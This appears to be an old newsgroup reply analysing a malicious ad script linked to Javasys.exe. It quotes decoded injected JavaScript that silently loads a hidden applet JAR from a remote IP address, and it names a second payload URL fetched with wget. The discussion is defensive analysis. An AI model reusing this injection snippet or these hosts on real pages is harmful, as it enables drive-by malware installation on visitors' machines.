Re: Javasys.exe: More of the same or new?

From: Ant (not_at_home.today)
Date: 09/07/05

  • Next message: David H. Lipman: "Re: SOPHOS Antivirus"
    Date: Tue, 6 Sep 2005 23:28:33 +0100
    
    

    "Mark" wrote:

    > Ant wrote:
    >> That's strange, I decoded the following for the above function
    >> ("document.write" line wrapped, and http munged to h--p)
    >>
    >> function __increment_counter() {
    >> document.write("<APPLET ARCHIVE=\"h--p://209.190.137.29/user/ds/c.jar\"
    >> codebase=\"h--p://209.190.137.29/user/ds/\"
    >> CODE=\"BB.class\" WIDTH=1 HEIGHT=1>
    >> <param name=\"userid\" value=\"global/ds-1\"></APPLET>");};
    >
    > That is quite interesting. From what you saw, does the method of
    > getting the script change which script you get?

    It could do, depending on how the server is set up to respond to your
    HTTP request headers. For example, some will serve different content
    based on the "User-Agent" field. I only tried one method, which was to
    prefix "view-source:" to the URL in the IE address box. This just
    fetches (GETs) the item into notepad without running or rendering
    anything in the browser.

    > All I did was "wget h--p://198.88.20.158/iSponsor.js" from one of my
    > linux boxes.

    That's the same URL I used (without the "?bannerid=403" after it).
    Perhaps the site doesn't like wget, perhaps iSponsor.js changes from
    time to time, or perhaps it's something else I don't know about. You
    could tell wget to use a User-Agent string like IE or Mozilla sends,
    and see if it makes a difference.

    > In all honesty, I was being lazy and probably shouldn't
    > have posted without all the information.

    Not at all; you sparked my interest to find an exploit!


  • Next message: David H. Lipman: "Re: SOPHOS Antivirus"